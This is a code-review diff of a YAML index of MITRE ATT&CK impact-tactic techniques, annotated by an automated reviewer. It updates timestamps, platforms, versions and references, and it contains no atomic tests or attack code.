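Review bot: the two new sub-technique objects T1496.004 and T1496.001 carry `atomic_tests: []` but no `identifier:` key, whereas T1491.001 just above (and T1531 and T1486 below) pair `identifier:` with `atomic_tests: []`; if the generator only emits `identifier` for techniques that once had tests this is fine, otherwise the new entries should match the existing shape. Both new objects also ship with `x_mitre_detection: ''`, so their listed data sources (`Cloud Service: Cloud Service Modification` and `Application Log: Application Log Content` for T1496.004; process, network, file and host-status sources for T1496.001) are the only detection guidance they carry; that is upstream content and not something to patch in this index.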
@@ -57533,11 +58512,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -57560,6 +58538,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57577,9 +58556,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
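Review bot: adding `IaaS` to T1531's platforms (alongside the `Office 365` to `Office Suite` swap and the 1.3 version bump) changes the platform membership that per-platform indexes are built from; because `atomic_tests` for T1531 is still empty no index rows result today, but the IaaS index will need regenerating as soon as a test is added under this technique.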
@@ -57605,9 +58585,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -57694,7 +58673,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
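Review bot: T1486's `modified` also moves backwards (2022-11-08 to 2022-06-16), the same pattern as T1491.001 earlier in this diff; confirm the upstream snapshot the index was regenerated from is the intended one.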
@@ -57718,12 +58697,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -57742,7 +58720,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -57759,18 +58736,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
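Review bot: the net platform change for T1499 in this hunk is substantive: `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` are dropped and only `IaaS` is kept alongside Windows, Linux, macOS and Containers, so expect per-platform indexes to lose T1499 rows for the removed platforms. The deleted `x_mitre_modified_by_ref` line (and the `x_mitre_attack_spec_version` removed in the previous hunk) is just a key reorder, since both reappear at the end of the object further down with the same identity and spec version 3.2.0.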
@@ -57794,8 +58766,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
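Review bot: the FS-ISAC reference URL moves from `/media/2012/...` to `/Media/PDF/Y2012/...` on ic3.gov with a new retrieval date; the identical update is applied to the same reference under T1498 later in the diff, so the two copies stay consistent. A quick check that the new path actually serves the PDF is worthwhile, since a dead reference URL in the index is easy to miss.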
@@ -57815,33 +58787,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
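Review bot: the rewritten T1496 description cites only `Sysdig Cryptojacking Proxyjacking 2023`, so the Kaspersky, CloudSploit, Trend Micro, GoBotKR and Sysdig Proxyjacking citations removed from its `external_references` further down are genuinely orphaned and their removal is consistent; the cryptomining detail dropped here is carried verbatim by the new T1496.001 object above, so no content is lost. The bullet list embedded as `\n\n* ` inside the double-quoted scalar parses as plain text in YAML and renders as markdown downstream, which matches how the other multi-paragraph descriptions in this file are stored.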
@@ -57852,7 +58813,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -57869,8 +58830,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
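Review bot: the `x_mitre_version` jump to 2.0 is a major bump, consistent with T1496 gaining sub-techniques in this same diff; `SaaS` added to the parent platforms matches the platform of the new T1496.004, and the two new data sources (`Cloud Service: Cloud Service Modification`, `Application Log: Application Log Content`) are the same pair T1496.004 lists, so parent and child stay in sync.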
@@ -57889,99 +58853,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
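Review bot: the T1565.002 block is almost entirely key reordering; the substantive changes are the `modified` timestamp (2022-05-11 to 2024-08-26) and the FireEye APT38 reference URL moving from content.fireeye.com to a mandiant.com PDF, with `x_mitre_version` left at 1.1. A textual diff this large is hard to verify by eye, so compare the parsed YAML of both versions to confirm no key was dropped in the shuffle. The pre-existing typos in the unchanged context (`as at passes`, `an opportunity deploy a tool`) and the stray space in `Targeting GitLab .` are upstream ATT&CK text and should not be patched here, since the next regeneration would revert them.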
@@ -57990,7 +58928,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58016,9 +58954,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
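Review bot: the added data source `Cloud Storage: Cloud Storage Modification` and the 1.3 version bump belong with the description change in the previous hunk (cloud storage objects, machine images, database instances); no database-specific data source is added, so detection coverage for the newly mentioned database instances rests on the existing `Snapshot`, `Image` and `Cloud Storage` sources. That is the upstream choice being imported, nothing to change in this index.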
@@ -58074,55 +59013,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
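Review bot: as with T1565.002, the T1498 block is a reorder: the `x_mitre_platforms`, `x_mitre_contributors`, id/type/created fields and five `external_references` removed here all reappear later in the object, with the FS-ISAC URL updated to the new ic3.gov path and the platform list narrowed. Verify by parsed YAML rather than by eye; the `modified` bump (2022-05-11 to 2024-10-15) is the only non-structural change in this hunk.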
@@ -58137,6 +59032,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -58149,16 +59048,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
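Review bot: T1498's platform list is now Windows, IaaS, Linux, macOS, Containers, so `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from the removed block earlier are gone, mirroring the T1499 change above; the five re-added references match the five removed ones, and `revoked: false` plus `x_mitre_deprecated: false` are now explicit where the old object had only `x_mitre_is_subtechnique: false`.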
@@ -58226,11 +59161,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58248,7 +59182,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58275,7 +59209,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -58325,13 +59259,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -58399,11 +59332,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
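Review bot: The `modified` timestamp for T1529 moves backwards, from `'2023-05-09T14:00:00.188Z'` to `'2023-03-22T20:45:22.531Z'`. A regenerated index should normally only advance this value; a regression usually means the generator read an older or differently-sourced bundle. The same backwards move appears later in this patch for T1133, T1195.003, T1195.002 and T1200, so verify the source bundle version before merging.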
@@ -58468,13 +59400,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
